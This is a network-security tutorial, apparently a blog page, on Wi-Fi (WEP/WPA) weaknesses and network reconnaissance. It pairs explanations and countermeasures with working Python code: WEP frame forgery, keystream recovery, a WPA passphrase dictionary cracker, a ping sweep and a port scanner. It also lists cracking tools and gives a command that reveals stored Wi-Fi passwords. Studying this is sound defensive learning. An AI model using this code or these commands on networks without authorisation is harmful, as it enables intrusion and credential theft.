Mac Hacking Over Network

Wireless networks are accessible to anyone within the router’s transmission radius. This makes them vulnerable to attacks. Hotspots are available in public places such as airports, restaurants, parks, etc.

In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect against such attacks.



What is a wireless network?

A wireless network links computers and other devices by radio instead of cable. IEEE 802.11 defines both the physical layer (Layer 1, the radio) and the MAC sublayer of the data link layer (Layer 2) of the OSI model; the authentication and encryption discussed below operate at Layer 2, on every frame.

How to access a wireless network?

You will need a wireless-enabled device such as a laptop, tablet or smartphone. You will also need to be within the transmission radius of a wireless access point. Most devices (if the wireless option is turned on) will show you a list of available networks. If a network is not password protected, you just have to click connect. If it is password protected, you will need the password to gain access.

Wireless Network Authentication

Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP

WEP is the acronym for Wired Equivalent Privacy. It was developed for the IEEE 802.11 WLAN standards. Its goal was to provide privacy equivalent to that of a wired network. WEP works by encrypting the data being transmitted over the network to keep it safe from eavesdropping.

WEP Authentication

Open System Authentication (OSA) – any station that asks to authenticate is accepted; no credentials are checked at this stage. Access is then controlled only by whether the station holds the WEP key needed to send and receive encrypted data frames.

Shared Key Authentication (SKA) – the access point sends a random challenge in cleartext to the station requesting access. The station encrypts the challenge with its WEP key and returns it; if the AP decrypts it back to the challenge it sent, access is granted. Because an eavesdropper sees both the cleartext challenge and its ciphertext, SKA hands out a usable RC4 keystream for that IV, which is why open authentication is actually the less weak of the two WEP options.

WEP Weakness

WEP has significant design flaws and vulnerabilities.

  • Packet integrity is protected only by a CRC-32 checksum (the ICV), which is a linear function and not a keyed MAC. An attacker can flip chosen bits in the encrypted payload and correct the encrypted ICV without knowing the key, so the modified frame is accepted as genuine. This allows traffic to be tampered with undetected; combined with redirecting frames, it can be used to decrypt traffic or gain access to the network.
  • WEP uses the RC4 stream cipher. The per-packet RC4 key is the concatenation of a 24-bit initialization vector (IV), sent in cleartext, and the secret key, which is 40 or 104 bits long (marketed as "64-bit" and "128-bit" WEP, counting the IV). A 40-bit key is short enough to brute-force outright.
  • Certain "weak" IVs cause the first bytes of the RC4 keystream to leak information about the key (the FMS attack). Collecting enough frames with weak IVs recovers the key statistically; later attacks (KoreK, PTW) need far fewer frames.
  • WEP keys are often generated from a passphrase by vendor-specific tools; such keys are vulnerable to dictionary attacks.
  • Key management is poorly defined. WEP provides no centralized key management, so changing a key, especially on a large network, is difficult and rarely done.
  • With only 24 bits, the IV space is exhausted after about 16.7 million frames (a few hours on a busy network), and many drivers choose IVs poorly. A reused IV means a reused keystream: XORing two such ciphertexts cancels the keystream and exposes the XOR of the two plaintexts.

Because of these security flaws, WEP has been deprecated in favor of WPA.
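The two WEP flaws above that need no key at all, the linear CRC-32 ICV and keystream reuse under a repeated IV, can be shown end to end in a few dozen lines. The following is an added example written for this page (not code from the original tutorial or from any of the tools it names). The key, IV and the two HTTP-like frames are constructed fixtures; the attacker functions never see the key.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). XOR with the keystream both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as WEP sends it: 3-byte IV in clear, then RC4(IV || key) over plaintext || ICV."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """What the access point does: strip the IV, decrypt, and accept only if the ICV matches."""
    plain = rc4(frame[:3] + key, frame[3:])
    if plain[-4:] != icv(plain[:-4]):
        raise ValueError("ICV check failed")
    return plain[:-4]


def forge_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Turn the plaintext P into P xor delta without knowing the key.
    CRC-32 is affine, so crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0...0): the attacker XORs delta
    into the ciphertext and the matching correction into the (still encrypted) ICV."""
    icv_fix = xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + icv_fix)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """One frame whose plaintext is known (a predictable header, say) yields that IV's keystream."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_reused_iv(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame sent under the same IV (no longer than the recovered keystream)."""
    return xor(frame[3:], keystream)[:-4]


def demo() -> dict:
    key = bytes.fromhex("0123456789")              # constructed 40-bit WEP key; unknown to the attacker
    iv = b"\x00\x00\x01"                           # the driver reuses this IV for both frames
    p1 = b"GET /index.html HTTP/1.0\r\n"           # constructed traffic with a guessable plaintext
    p2 = b"user=alice&pass=hunter2"                # constructed; shorter than p1, so the keystream covers it
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)

    # Attack 1: bit-flip c1 so the AP decrypts a request for a different URL, ICV still valid.
    target = b"GET /admin.html HTTP/1.0\r\n"
    forged = forge_bitflip(c1, xor(p1, target))

    # Attack 2: the known plaintext p1 gives the keystream for this IV, which decrypts c2 outright.
    keystream = recover_keystream(c1, p1)

    return {
        "forged_plaintext": wep_decrypt(key, forged),   # the AP accepts the forgery
        "recovered_p2": decrypt_reused_iv(c2, keystream),
    }
```

Neither attack touches RC4 itself: the first is pure CRC algebra, the second is the stream-cipher rule that a keystream must never be used twice. That is why WPA replaced the CRC with a keyed MIC and widened the IV, and why WPA2 moved to AES-CCMP.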

WPA

WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP, and it is used to encrypt data on 802.11 WLANs. Its TKIP cipher keeps RC4 (so that it could run on WEP-era hardware) but uses a 48-bit IV instead of WEP's 24 bits, mixes a fresh per-packet key from a temporal key, and adds a keyed message integrity check (Michael) in place of the CRC. WPA2 replaced TKIP with AES-CCMP, which is what should be in use today.

WPA Weaknesses

  • TKIP was a retrofit for RC4 hardware and has known weaknesses; the Beck-Tews attack recovers the Michael MIC key and lets an attacker inject a small number of forged frames. Use WPA2 with AES-CCMP rather than TKIP.
  • It is vulnerable to denial of service attacks: management frames such as deauthentication are unauthenticated (unless 802.11w protected management frames are enabled), so anyone in range can kick stations off the network.
  • Pre-shared keys (WPA-Personal) are derived from passphrases. Because an attacker can capture the 4-way handshake and test candidate passphrases offline, weak passphrases are vulnerable to dictionary attacks.

How to Crack Wireless Networks

WEP cracking

Cracking is the process of exploiting security weaknesses in wireless networks to gain unauthorized access. WEP cracking refers to attacks on networks that use WEP to implement their security controls. There are basically two types of cracks:

  • Passive cracking – the attacker only listens and has no effect on the network traffic until the WEP key has been recovered. It is difficult to detect but slow, because it depends on legitimate users generating enough traffic.
  • Active cracking – the attacker injects frames (for example by replaying captured ARP requests) to provoke thousands of new IVs per minute. It adds load to the network and is easier to detect, but it is far more effective and works even when the network is almost idle.

WEP Cracking Tools

  • Aircrack-ng – wireless sniffer and WEP/WPA-PSK cracker; the maintained suite that succeeded the original Aircrack. Can be downloaded from http://www.aircrack-ng.org/
  • WEPCrack – an open source program for breaking 802.11 WEP secret keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
  • Kismet – wireless network detector (it finds hidden networks as well as visible ones), packet sniffer and intrusion detection system. https://www.kismetwireless.net/
  • WepDecrypt – this tool uses active dictionary attacks to crack WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/

WPA Cracking

WPA-Personal uses a 256-bit pre-shared key (PSK) for authentication; the PSK is normally derived from a passphrase of 8 to 63 characters together with the SSID. Short or predictable passphrases are vulnerable to dictionary attacks and other password-cracking techniques, because a captured 4-way handshake lets the attacker test candidates offline without touching the network again. The following tools can be used to crack WPA keys.

  • coWPAtty – this tool is used to crack pre-shared keys (PSK) with dictionary and brute force attacks against a captured handshake. http://wirelessdefence.org/Contents/coWPAttyMain.htm
  • Cain & Abel – this tool can be used to decode capture files from other sniffing programs such as Wireshark. The capture files may contain WEP or WPA-PSK encrypted frames. http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
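What coWPAtty and Aircrack-ng actually do with a captured handshake, and why the "weak passphrase" item in the WPA weaknesses list above is an offline attack, is the PMK/PTK derivation of 802.11i. The block below is an added example written for this page, not code from either tool: it derives the PMK with PBKDF2, expands the PTK with the 802.11i PRF, recomputes the Key MIC of handshake message 2 and compares it with the captured one. The SSID, MAC addresses, passphrase and wordlist are constructed; the EAPOL-Key frame is a minimal one with empty Key Data (a real message 2 carries the RSN IE there, which only changes the bytes the MIC covers, not the method).

```python
import hashlib
import hmac
import os
import struct

MIC_OFFSET = 81   # 4-byte EAPOL header + descriptor fields preceding the 16-byte Key MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The 4096 rounds are the only thing slowing a dictionary attack down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
               length: int = 48) -> bytes:
    """802.11i PRF-n over "Pairwise key expansion" and the sorted MACs and nonces.
    48 bytes is PRF-384 for CCMP; the first 16 bytes are the KCK that authenticates the handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2: HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key frame for handshake message 2 (station -> AP) with empty Key Data.
    Key Info 0x010A = MIC present | pairwise | descriptor version 2 (HMAC-SHA1 / AES key wrap)."""
    body = (bytes([2]) + struct.pack(">HHQ", 0x010A, 16, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0))
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body


def capture_handshake(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> dict:
    """Stand-in for the sniffer: both sides know the passphrase and produce exactly what an attacker
    captures from messages 1 and 2 of the 4-way handshake. Constructed fixture for the demo."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "msg2": msg2}


def crack_psk(capture: dict, wordlist):
    """Offline dictionary attack: for each candidate derive PMK -> PTK -> KCK and compare the
    recomputed MIC with the captured one. Returns the passphrase, or None if it is not in the list."""
    captured_mic = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["msg2"]), captured_mic):
            return candidate
    return None
```

Two things follow directly from the code. The PMK depends on the SSID, so rainbow tables only work per SSID (which is why default SSIDs are a liability), and everything after PBKDF2 is cheap, so the cost per guess is one PBKDF2 call; that is the figure hashcat and GPUs optimise, and the only defence in WPA-Personal is passphrase length. WPA-Enterprise removes the shared secret altogether.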

General Attack types

  • Sniffing – intercepting packets as they are transmitted over a network. Captured data can then be decoded using tools such as Cain & Abel or Wireshark, which can decrypt WEP and WPA-PSK captures given the key (and, for WPA, the captured handshake).
  • Man in the Middle (MITM) Attack – the attacker inserts himself between a station and the network (for example with a rogue access point carrying the same SSID) so that all traffic passes through him, where it can be read or altered. Eavesdropping without that interposition is sniffing, not MITM.
  • Denial of Service Attack – the main intent of this attack is to deny legitimate users network resources, typically by flooding the channel with forged deauthentication or disassociation frames. FataJack is one tool that can perform this type of attack.

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks also depends on how active the users of the target network are.

We will provide you with basic information that can help you get started. BackTrack was a Linux-based security distribution built on top of Ubuntu; it has since been succeeded by Kali Linux (Debian-based), which ships the same kind of tooling. BackTrack/Kali can be used to gather information, assess vulnerabilities and perform exploits, among other things.

Some of the popular tools included are:

  • Metasploit
  • Wireshark
  • Aircrack-ng
  • NMap
  • Ophcrack

Cracking wireless network keys requires patience and the resources mentioned above. At a minimum, you will need the following:

  • A wireless network adapter capable of monitor mode and packet injection (hardware)
  • Kali Linux. You can download it from https://www.kali.org/downloads/
  • To be within range of the target network. If the users of the target network are actively using it and connecting to it, your chances of cracking it are significantly improved.
  • Sufficient knowledge of Linux-based operating systems and working knowledge of Aircrack-ng and its various tools.
  • Patience: cracking the keys may take some time depending on a number of factors, some of which are beyond your control, such as how actively the target network's users are using it while you sniff packets.

How to Secure wireless networks

To minimize wireless network attacks, an organization can adopt the following policies:

  • Change the default passwords that come with the hardware (both the Wi-Fi key and the administrative login).
  • Enable the authentication mechanism: WPA2 or WPA3 with AES-CCMP. Do not use WEP or TKIP at all; no key length makes them safe.
  • Restricting access to registered MAC addresses adds only a small hurdle, because a MAC address is sent in cleartext in every frame and is trivially spoofed.
  • Use a strong WPA-PSK passphrase: long, random and not a dictionary word. Length matters more than mixing symbols, since the passphrase is attacked offline from a captured handshake. On larger networks prefer WPA-Enterprise (802.1X), so that there is no shared secret to crack.
  • Firewall software and network segmentation can further limit what an intruder who does get onto the wireless network can reach.

Hacking Activity: Crack Wireless Password

In this practical scenario, we are going to use Cain & Abel to decode the wireless network passwords stored in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.

Decoding Wireless network passwords stored in Windows

  • Download Cain & Abel from the link provided above.
  • Open Cain & Abel.
  • Ensure that the Decoders tab is selected, then click on Wireless Passwords in the navigation menu on the left-hand side.
  • Click on the button with the plus sign.
  • Assuming you have connected to a secured wireless network before on this machine, the decoder lists each saved profile with its encryption type, SSID and the password that was used.

Cain & Abel is no longer maintained. On current Windows versions the same stored keys can be displayed without it, from an elevated command prompt, with netsh wlan show profile name="<SSID>" key=clear.

Summary

  • Wireless network transmissions can be received by anyone within range; this poses many security risks.
  • WEP is the acronym for Wired Equivalent Privacy. It has security flaws which make it far easier to break than later security implementations.
  • WPA is the acronym for Wi-Fi Protected Access. It is stronger than WEP; WPA2 with AES-CCMP is the current minimum.
  • Intrusion Detection Systems can help detect unauthorized access.
  • A good security policy can help protect a network.


Network hacking is the gathering of information about networks and the computers on them over the Internet, and the use of that information to attack them.

Ways To Attack a Network

Ping

A raw IP address such as 212.214.172.81 tells you little on its own. On Windows you can ask ping to resolve it to a host name: the -a option performs a reverse lookup through the Domain Name System (DNS). Despite the popular backronym "Packet Internet Groper", ping is named after the sonar pulse; it ships with practically every Internet-capable system, including all current Windows versions.

Make sure you are connected to the Internet. Open a command prompt and enter the following command:

ping -a 123.123.12.1

Ping resolves the address and prints the host name, which often identifies the provider the attacker uses, e.g.:

dialup21982.gateway123.provider.com

This means that the attacker was connected through "provider.com". Unfortunately, many IP addresses have no reverse DNS record and cannot be converted into a domain name this way; note also that the reverse record is set by whoever controls the address block, so it is a hint, not proof.

Pinging is normally the first step in profiling a target. Ping uses ICMP (Internet Control Message Protocol) to determine whether the target host is reachable: it sends ICMP Echo Request packets to the target, and a live host that is not filtering ICMP answers with ICMP Echo Reply packets. No reply therefore means "down or filtered", not necessarily "down".

All versions of Windows include the ping tool. To ping a remote host, click Start, then Run, and type ping <ip address or hostname>

(For example: ping yahoo.com)

For more parameters that can be used with the ping command, go to the command prompt and type ping /?.

Ping Sweep

If you have no specific target and just want any live system, a ping sweep is the solution. A ping sweep also uses ICMP, but it sends Echo Requests to every address in a specified range and reports those that reply, which is much faster than pinging addresses one at a time. Nmap's -sn option (host discovery only, no port scan) performs a ping sweep and falls back to TCP and ARP probes where ICMP is filtered.
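To make the Echo Request / Echo Reply exchange behind ping and the ping sweep concrete, here is an added example for this page (not code from ping, tracert or Nmap). It builds an ICMP Echo Request with the RFC 1071 checksum, validates and parses an Echo Reply, and sweeps a range through a pluggable probe function so that the logic runs offline against a constructed "network"; the raw-socket probe at the end is what you would plug in on a real network, and it assumes root (raw sockets) and a 20-byte IPv4 header without options. The addresses and the set of live hosts are constructed.

```python
import ipaddress
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def internet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, then complemented.
    Verifying a received packet means summing it with its checksum field in place and expecting 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes = b"abcdefghijklmnop") -> bytes:
    """ICMP header (type 8, code 0, checksum, identifier, sequence) followed by the payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    checksum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, checksum, ident, seq) + payload


def parse_echo_reply(packet: bytes):
    """Return (ident, seq, payload) for a well-formed Echo Reply, or None for anything else
    (wrong type or code, bad checksum, truncated packet)."""
    if len(packet) < 8:
        return None
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != ICMP_ECHO_REPLY or code != 0 or internet_checksum(packet) != 0:
        return None
    return ident, seq, packet[8:]


def ping_sweep(cidr: str, probe, ident: int = 0x1234) -> list:
    """Send one Echo Request to every host address in cidr through probe(ip, packet) -> reply bytes
    or None (timeout), and return the hosts whose reply carries our identifier and sequence number.
    Matching ident/seq keeps stray or spoofed replies from being counted as live hosts."""
    live = []
    for seq, host in enumerate(ipaddress.ip_network(cidr).hosts(), start=1):
        reply = probe(str(host), build_echo_request(ident, seq))
        parsed = parse_echo_reply(reply) if reply else None
        if parsed and parsed[0] == ident and parsed[1] == seq:
            live.append(str(host))
    return live


def fake_network(live_hosts):
    """Constructed stand-in for the wire: hosts in live_hosts answer with a proper Echo Reply
    (same ident, seq and payload); everything else stays silent, like a down or filtered host."""
    def probe(ip, request):
        if ip not in live_hosts:
            return None
        _, _, _, ident, seq = struct.unpack("!BBHHH", request[:8])
        body = struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, ident, seq) + request[8:]
        return struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, internet_checksum(body), ident, seq) + request[8:]
    return probe


def raw_socket_probe(timeout: float = 1.0):
    """Real sender for a live network: needs root/CAP_NET_RAW for a raw ICMP socket.
    Assumption: the kernel hands back a 20-byte IPv4 header (no options) in front of the ICMP message."""
    import socket

    def probe(ip, request):
        with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
            s.settimeout(timeout)
            s.sendto(request, (ip, 0))
            try:
                data, _ = s.recvfrom(1500)
            except socket.timeout:
                return None
        return data[20:]
    return probe
```

Usage on a real network would be ping_sweep("192.168.1.0/24", raw_socket_probe()) as root. The sequential loop is deliberately simple; a tool like Nmap sends probes in parallel and, as noted above, does not rely on ICMP alone, because a host that drops Echo Requests at its firewall is invisible to this sweep while still being fully reachable on TCP.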


Tracert:

Tracert is another useful tool for learning more about a remote host and the path to it. Windows tracert sends ICMP Echo Requests with increasing TTL values; each router that discards a packet when its TTL expires returns an ICMP Time Exceeded message, which reveals that hop (Unix traceroute does the same with UDP probes by default).

Tracert therefore shows the systems involved in carrying packets from source to destination. It works towards the computer whose IP has been entered and lists every hop starting from your own Internet connection; both the IP address and the domain name (if available) are displayed for each hop.

If ping cannot resolve a name, tracert may still deliver the name of the last or second-last hop before the attacker, which can support conclusions about the provider the attacker uses and the region the attacks are coming from.

To perform a tracert, go to the command prompt and type tracert <destination address>

(For example: tracert yahoo.com).


Port Scanning:

After you have determined that your target system is alive, the next important step is to perform a port scan on it.

There is a wide range of port scanners available for free, but many of them use outdated scanning techniques that a network administrator can easily recognize. Personally I like to use Nmap, which has a wide range of options.


Apart from port scanning, Nmap is capable of identifying the operating system in use (-O), the version numbers of the services running (-sV), firewalls and packet filters in the path, and a lot more.

Common ports:

Below is a list of some common ports and the respective services running on the ports.

20 FTP data (File Transfer Protocol)
21 FTP control (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name System)
67/68 DHCP (Dynamic Host Configuration Protocol; 67 is the server side, 68 the client side)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS name service (netbios-ns)
138 NetBIOS datagram service (netbios-dgm)
139 NetBIOS session service (netbios-ssn; SMB over NetBIOS)
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3, obsolete)
389 LDAP
443 HTTPS (HTTP over TLS/SSL)
445 SMB directly over TCP (microsoft-ds, without NetBIOS)

Besides the above, there are also so-called Trojan ports: ports used by Trojans that give an attacker remote access to the system. A port number is only a convention, though; what is actually listening is established by the banner or by a version scan, not by the number.
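The simplest scan type, Nmap's -sT, is a plain TCP connect() against each port, and it is the one scan anyone can write and run without privileges. The block below is an added example for this page (not Nmap code): it probes a list of ports concurrently, grabs whatever banner the service volunteers, and demonstrates itself offline against a constructed loopback listener that imitates an SSH greeting. The banner and the listener are constructed; the port numbers are chosen by the OS at run time.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Service names for some of the well-known ports in the list above (a lookup only; trust the
# banner and nmap -sV over the port number).
COMMON_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 80: "http",
                110: "pop3", 139: "netbios-ssn", 143: "imap", 443: "https", 445: "microsoft-ds"}


def probe_port(host: str, port: int, timeout: float = 1.0):
    """TCP connect() probe of one port. It completes the three-way handshake, so it needs no
    privileges, but the target application sees (and may log) the connection, unlike Nmap's
    default half-open SYN scan (-sS). Returns (port, is_open, banner)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        if s.connect_ex((host, port)) != 0:       # non-zero errno: refused, filtered or timed out
            return port, False, b""
        banner = b""
        try:
            banner = s.recv(256)                  # SSH, SMTP, FTP and friends speak first
        except (socket.timeout, OSError):
            pass                                  # open, but the service waits for the client
    return port, True, banner


def connect_scan(host: str, ports, timeout: float = 1.0, workers: int = 32) -> dict:
    """Probe the given ports concurrently; returns {open_port: (service_guess, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return {p: (COMMON_PORTS.get(p, "unknown"), banner) for p, is_open, banner in results if is_open}


def start_fake_service(banner: bytes):
    """Constructed target for the offline demo: a loopback listener on an OS-chosen port
    that greets every client with banner and hangs up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                            # listener closed, demo over
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port() -> int:
    """A port nothing listens on, so the scan has a known-closed port to report correctly."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan one open and one closed loopback port; returns (open_port, closed_port, findings)."""
    srv, open_port = start_fake_service(b"SSH-2.0-OpenSSH_9.2\r\n")   # constructed banner
    closed_port = unused_port()
    try:
        found = connect_scan("127.0.0.1", [open_port, closed_port], timeout=0.5)
    finally:
        srv.close()
    return open_port, closed_port, found
```

Against a real host you would call connect_scan("10.0.0.5", range(1, 1025)). Two practical points the code makes visible: a closed port answers immediately with a reset (connect_ex returns ECONNREFUSED), whereas a filtered port only times out, so the timeout value dominates scan time against a firewalled host; and every probe is a full connection that lands in the target's application logs, which is exactly the detectability the text warns about and the reason Nmap defaults to the SYN scan when it has raw-socket privileges.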

Vulnerability Scanning:

Every operating system and every service has some vulnerabilities due to programming errors, and these vulnerabilities are what a successful hack depends on. Bugtraq was for many years the mailing list where vulnerabilities in various systems were disclosed and discussed. Exploit writers write exploit code to take advantage of such vulnerabilities.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.

Some of such vulnerability scanners include Shadow Security Scanner, Stealth HTTP Scanner, Nessus, etc.

Tools Descriptions:

  1. Wireshark (formerly Ethereal) –

Wireshark is a network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The project's goal is a commercial-quality, open source analyzer with features that closed-source sniffers lack; its GUI, originally GTK+-based, is now built on Qt.

Works great on both Linux and Windows (with a GUI), is easy to use, and can reconstruct TCP/IP streams (Follow TCP Stream).

Download Wireshark Here – http://www.wireshark.org/

2. Nessus Remote Security Scanner

Nessus went closed source in 2005 and is now a commercial product; a free Nessus Essentials edition is available for home use on a limited number of hosts. It works with a client-server framework (today a web interface in front of a local scanner service).

Nessus is one of the world's most widely used vulnerability scanners, used to audit business-critical enterprise devices and applications.

Get Nessus Here – http://www.nessus.org/download/

3. NMAP (Network Mapper)


Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.


Can be used by beginners (the -sT connect scan) and by pros alike (--packet-trace shows every packet sent and received). A very versatile tool, once you fully understand the results.

Get Nmap Here – http://www.insecure.org/nmap/download.html

4. Nikto


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto here


5. Zenmap

Zenmap is the free and open source GUI for Nmap. It is available on many operating systems (Linux, Windows, Mac OS X, BSD, etc.) and is used to gather information about any device reachable over the network.

Using Nmap, we can gather information about any host inside or outside our network, knowing only its IP address.

6. Tunna and PhanTap

Tunna:

A Set of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP
It can be used to bypass network restrictions in fully firewalled environments.

Get Tunna here

Phantom Tap (PhanTap) – An ‘Invisible’ Network Tap Aimed at Red Teams.

With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.

PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X – 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

Get PhanTap here


7. John The Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here – http://www.openwall.com/john/

8. Yersinia

Yersinia is a network tool designed to take advantage of weaknesses in several Layer 2 protocols. It aims to be a solid framework for analyzing and testing deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1Q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here – http://yersinia.sourceforge.net/

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here – http://www.heidi.ie/eraser/download.php

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must-have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients (Windows 10 and later now ship an OpenSSH client, but PuTTY remains popular).

Get PuTTY Here – http://www.chiark.greenend.org.uk/~sgtatham/putty/

11. LCP

